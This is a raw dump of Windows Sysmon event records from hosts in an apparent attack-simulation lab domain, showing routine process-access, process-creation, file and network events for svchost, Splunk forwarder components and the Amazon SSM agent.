09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981981Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981980Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8E7D-6151-307A-00000000FD01}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981979Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E7D-6151-307A-00000000FD01}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981978Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.642{69CF5F33-8E7D-6151-307A-00000000FD01}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981977Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.610{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B9168D06259DED3432239E4FD13AFCF,SHA256=919F80F4A60067C64557827D2D2A50E6ABB1693989113C08FCEF9F13BD8A03EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982009Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91899E7CC94EB15E008DB1EAA19F74A5,SHA256=F5B180F3554F06E18133D6C8E5179CF2C9B607BAB61F1B975A65F49673011C6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982008Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B69B7340BC3D2EACEC946EAEE8159D4,SHA256=587006A446ABF10E85438BBC2026E842794EBF5FAB8B6DAA99AC7084AA3491CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982007Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19F7F7D6CCBAB399EB661EB699BFFBE2,SHA256=4871D0D2B1229F8379F59D614BF50E9E2B346A2D4BB36DD05860DEE89688F381,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982006Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.708{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4323MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:23.981{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54306-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000982005Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.518{69CF5F33-8E7E-6151-317A-00000000FD01}5723036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982004Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E7E-6151-317A-00000000FD01}572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982003Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982002Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982001Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982000Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981999Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981998Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981997Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981996Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981995Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.346{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981994Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.331{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8E7E-6151-317A-00000000FD01}572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981993Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.331{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E7E-6151-317A-00000000FD01}572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981992Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.331{69CF5F33-8E7E-6151-317A-00000000FD01}572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000982038Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:23.839{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59583-false10.0.1.12-8000- 23542300x80000000000000001057637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:27.967{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210927092018-006MD5=418358CD28D1B50422280074BE968B1D,SHA256=C8286C1C0A91E4E2C2FF9D12E0FDD08F235EAD61265C1678C815B6AB5A1254BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:27.104{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BF02F6D89B8EEBF787AEA7BEBF2AC65,SHA256=0DBFA2BABB0332E71839C79CD31AB3FA88A7D3D499F6A0E90B6F8F445EA20C32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982037Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.908{69CF5F33-8E7F-6151-337A-00000000FD01}3840372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982036Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.712{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E7F-6151-337A-00000000FD01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982035Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.710{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982034Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.710{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\